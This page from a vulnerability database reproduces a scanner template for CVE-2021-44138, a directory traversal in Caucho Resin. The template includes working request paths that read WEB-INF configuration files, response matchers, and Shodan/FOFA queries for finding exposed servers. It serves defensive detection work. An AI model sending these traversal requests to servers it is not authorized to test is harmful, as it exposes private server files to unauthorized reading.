| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-44138 | 4 Apr 202213:15 | β | attackerkb | |
| CVE-2021-44138 | 4 Apr 202216:27 | β | circl | |
| Caucho Resin θ·―εΎιεζΌζ΄ | 4 Apr 202200:00 | β | cnnvd | |
| CVE-2021-44138 | 4 Apr 202212:03 | β | cve | |
| CVE-2021-44138 | 4 Apr 202212:03 | β | cvelist | |
| Path Traversal in Caucho Resin | 5 Apr 202200:00 | β | github | |
| CVE-2021-44138 | 4 Apr 202213:15 | β | nvd | |
| '/;/WEB-INF/' Information Disclosure Vulnerability (HTTP) | 6 Oct 202100:00 | β | openvas | |
| Caucho Resin 4.0.52 - 4.0.56 Path Traversal Vulnerability - Active Check | 15 Jun 202300:00 | β | openvas | |
| CVE-2021-44138 | 4 Apr 202213:15 | β | osv |
id: CVE-2021-44138
info:
name: Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal
author: carrot2
severity: high
description: |
There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive data exposure.
remediation: |
Upgrade Caucho Resin to a version higher than 4.0.56 to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2021-44138
- https://github.com/maybe-why-not/reponame/issues/2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-44138
cwe-id: CWE-22
epss-score: 0.14115
epss-percentile: 0.96125
cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: caucho
product: resin
shodan-query:
- html:"Resin"
- http.html:"resin"
- cpe:"cpe:2.3:a:caucho:resin"
fofa-query: body="resin"
tags: cve2021,cve,resin,caucho,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/;/WEB-INF/web.xml"
- "{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
- "</web-app>"
condition: and
- type: word
part: header
words:
- "text/xml"
- "application/xml"
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100eb1c0e62d61faca4f761315b8d1c1daf5df89f70d47c2235ee6d46f40be9743c0220483269b859950a815c7bbaf7199100d5c78175931e1b51b7e8fe7bc71fbfd4b2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation